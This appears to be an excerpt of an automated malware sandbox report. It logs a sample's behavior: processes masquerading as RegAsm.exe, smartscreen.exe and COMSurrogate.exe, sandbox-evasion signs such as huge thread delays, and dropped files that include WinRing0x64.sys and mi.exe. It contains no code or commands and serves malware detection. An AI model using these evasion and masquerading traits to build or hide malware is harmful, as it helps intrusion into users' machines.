                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: Yara match  File source: 00000016.00000002.4571175471.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe  Memory allocated: E60000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe  Memory allocated: 2B80000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe  Memory allocated: 4B80000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe  Memory allocated: 1EB2AE80000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe  Memory allocated: 1EB44780000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe  Memory allocated: 1EE644D0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe  Memory allocated: 1EE7DD60000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe  Memory allocated: 216414A0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe  Memory allocated: 2165AF30000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe  Memory allocated: 1F788C50000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe  Memory allocated: 1F7A2820000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe  Memory allocated: 215335C0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe  Memory allocated: 2154D000000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe  Memory allocated: 2748E2B0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe  Memory allocated: 274A7D20000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe  Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe  Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\wscript.exe  Window found: window name: WSH-Timer
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com  Window / User API: threadDelayed 4443
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe  Window / User API: threadDelayed 5806
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe  Window / User API: threadDelayed 3873
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5588
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1759
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe  Window / User API: threadDelayed 2683
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe  Window / User API: threadDelayed 7073
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4432
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 508
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3005
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3388
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 361
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3455
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 821
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1761
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1305
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 4420
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 5390
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6515
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1547
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 4656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 5134
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 4625
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 5173
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\asm\WinRing0x64.sysJump to dropped file
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\asm\mi.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_18-99777
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrAPI coverage: 4.9 %
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com TID: 2360Thread sleep time: -44430s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe TID: 6984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe TID: 4976Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe TID: 6984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5056Thread sleep count: 5588 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5056Thread sleep count: 1759 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5432Thread sleep count: 2683 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5432Thread sleep time: -2683000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 1908Thread sleep count: 237 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 1908Thread sleep time: -237000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5432Thread sleep count: 7073 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5432Thread sleep time: -7073000s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2732Thread sleep count: 4432 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep time: -11990383647911201s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3280Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep count: 508 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 3005 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep count: 262 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1108Thread sleep count: 3388 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1860Thread sleep time: -9223372036854770s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1120Thread sleep count: 361 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 796Thread sleep count: 3455 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep count: 821 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1212Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2456Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3236Thread sleep count: 1761 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1016Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1524Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep count: 1305 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3504Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3352Thread sleep count: 283 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep count: 33 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -30437127721620741s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -100000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99875s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 4620Thread sleep count: 4420 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 4620Thread sleep count: 5390 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99765s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99656s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99546s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99437s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99327s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99215s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98917s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98690s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98561s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98453s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98343s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98228s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98118s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98015s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97904s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97796s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97687s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97578s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97468s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97359s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97239s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97115s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96977s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96868s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96765s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96654s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96546s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96437s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96317s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96161s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96031s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95879s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95750s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95627s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95500s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95390s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95281s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95172s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95047s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94937s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94828s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94718s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94609s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94499s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94390s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94280s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94171s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94061s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -93952s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -93843s >= -30000s
